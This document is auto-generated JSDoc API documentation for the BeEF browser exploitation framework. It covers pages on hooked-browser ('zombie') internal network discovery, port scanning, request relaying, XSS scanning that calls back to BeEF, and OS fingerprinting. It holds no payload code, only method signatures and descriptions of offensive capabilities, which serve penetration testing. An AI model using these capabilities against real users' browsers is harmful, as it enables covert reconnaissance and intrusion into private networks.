<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.local.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: local</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: local</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>local</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides networking functions for the local/internal network of the zombie.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".getLocalAddress"><span class="type-signature">(static) </span>getLocalAddress<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns the internal IP address of the zombie.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line54">line 54</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the internal ip of the zombie.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getLocalHostname"><span class="type-signature">(static) </span>getLocalHostname<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns the internal hostname of the zombie.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line72">line 72</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the internal hostname of the zombie.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".initializeSocket"><span class="type-signature">(static) </span>initializeSocket<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initializes the java socket. We have to use this method because
some browsers do not have java installed or it is not accessible.
in which case creating a socket directly generates an error. So this code
is invalid:
sock: new java.net.Socket();</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line24">line 24</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.portscanner.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: portscanner</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: portscanner</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>portscanner</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides port scanning functions for the zombie. A mod of pdp's scanner</p>
<p>Version: '0.1',
author: 'Petko Petkov',
homepage: 'http://www.gnucitizen.org'</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_portscanner.js.html">net/portscanner.js</a>, <a href="net_portscanner.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".scanPort"><span class="type-signature">(static) </span>scanPort<span class="signature">(callback, target, port, timeout)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>target</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>port</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_portscanner.js.html">net/portscanner.js</a>, <a href="net_portscanner.js.html#line25">line 25</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".scanTarget"><span class="type-signature">(static) </span>scanTarget<span class="signature">(callback, target, ports_str, timeout)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>target</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>ports_str</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_portscanner.js.html">net/portscanner.js</a>, <a href="net_portscanner.js.html#line54">line 54</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.requester.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: requester</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: requester</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>requester</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>request object structure:</p>
<ul>
<li>method: {String} HTTP method to use (GET or POST).</li>
<li>host: {String} hostname</li>
<li>query_string: {String} The query string is a part of the URL which is passed to the program.</li>
<li>uri: {String} The URI syntax consists of a URI scheme name.</li>
<li>headers: {Array} contain the operating parameters of the HTTP request.</li>
</ul></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_requester.js.html">net/requester.js</a>, <a href="net_requester.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">(requests_array)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>requests_array</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_requester.js.html">net/requester.js</a>, <a href="net_requester.js.html#line23">line 23</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.xssrays.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: xssrays</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: xssrays</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>xssrays</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>XssRays 0.5.5 ported to BeEF by Michele "antisnatchor" Orru'
The XSS detection mechanisms has been rewritten from scratch: instead of using the location hash trick (that doesn't work anymore),
if the vulnerability is triggered the JS code vector will contact back BeEF.
Other aspects of the original code have been simplified and improved.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line29">line 29</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".checkBrowser"><span class="type-signature">(static) </span>checkBrowser<span class="signature">(vector_array_index)</span><span class="type-signature"></span></h4>
<div class="description">
<p>return true is the attack vector can be launched to the current browser type.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>vector_array_index</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line80">line 80</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".run"><span class="type-signature">(static) </span>run<span class="signature">(url, method, vector, params, urlencode)</span><span class="type-signature"></span></h4>
<div class="description">
<p>this is the main core function with the detection mechanisms...</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>url</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>method</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>vector</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>params</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>urlencode</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line306">line 306</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".runJobs"><span class="type-signature">(static) </span>runJobs<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>run the jobs (run functions added to the stack), and clean the shit (iframes) from the DOM after a timeout value</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line453">line 453</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".startScan"><span class="type-signature">(static) </span>startScan<span class="signature">(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout)</span><span class="type-signature"></span></h4>
<div class="description">
<p>main function, where all starts :-)</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>xssraysScanId</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>hookedBrowserSession</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>beefUrl</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>crossDomain</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line116">line 116</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.os.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: os</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: os</h1>
<section>
<header>
<h2>os</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".getArch"><span class="type-signature">(static) </span>getArch<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Get OS architecture.
This may not be the same as the browser arch or CPU arch.
ie, 32bit OS on 64bit hardware</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line300">line 300</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getDefaultBrowser"><span class="type-signature">(static) </span>getDefaultBrowser<span class="signature">()</span><span class="type-signature"> → {string}</span></h4>
<div class="description">
<p>Detect default browser (IE only)
Written by unsticky
http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line19">line 19</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".getFamily"><span class="type-signature">(static) </span>getFamily<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Get OS family</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line314">line 314</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getName"><span class="type-signature">(static) </span>getName<span class="signature">()</span><span class="type-signature"> → {string}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line250">line 250</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".getVersion"><span class="type-signature">(static) </span>getVersion<span class="signature">()</span><span class="type-signature"> → {string}</span></h4>
<div class="description">
<p>Get OS name</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line329">line 329</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".isAndroid"><span class="type-signature">(static) </span>isAndroid<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line208">line 208</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isAros"><span class="type-signature">(static) </span>isAros<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line238">line 238</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isBeOS"><span class="type-signature">(static) </span>isBeOS<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line232">line 232</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isBlackBerry"><span class="type-signature">(static) </span>isBlackBerry<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line214">line 214</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isIpad"><span class="type-signature">(static) </span>isIpad<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line190">line 190</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isIphone"><span class="type-signature">(static) </span>isIphone<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line184">line 184</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isIpod"><span class="type-signature">(static) </span>isIpod<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line196">line 196</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isLinux"><span class="type-signature">(static) </span>isLinux<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line142">line 142</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isMacintosh"><span class="type-signature">(static) </span>isMacintosh<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line148">line 148</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isNokia"><span class="type-signature">(static) </span>isNokia<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line202">line 202</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isOpenBSD"><span class="type-signature">(static) </span>isOpenBSD<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line130">line 130</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isOsxLeopard"><span class="type-signature">(static) </span>isOsxLeopard<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line172">line 172</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isOsxMavericks"><span class="type-signature">(static) </span>isOsxMavericks<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line160">line 160</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
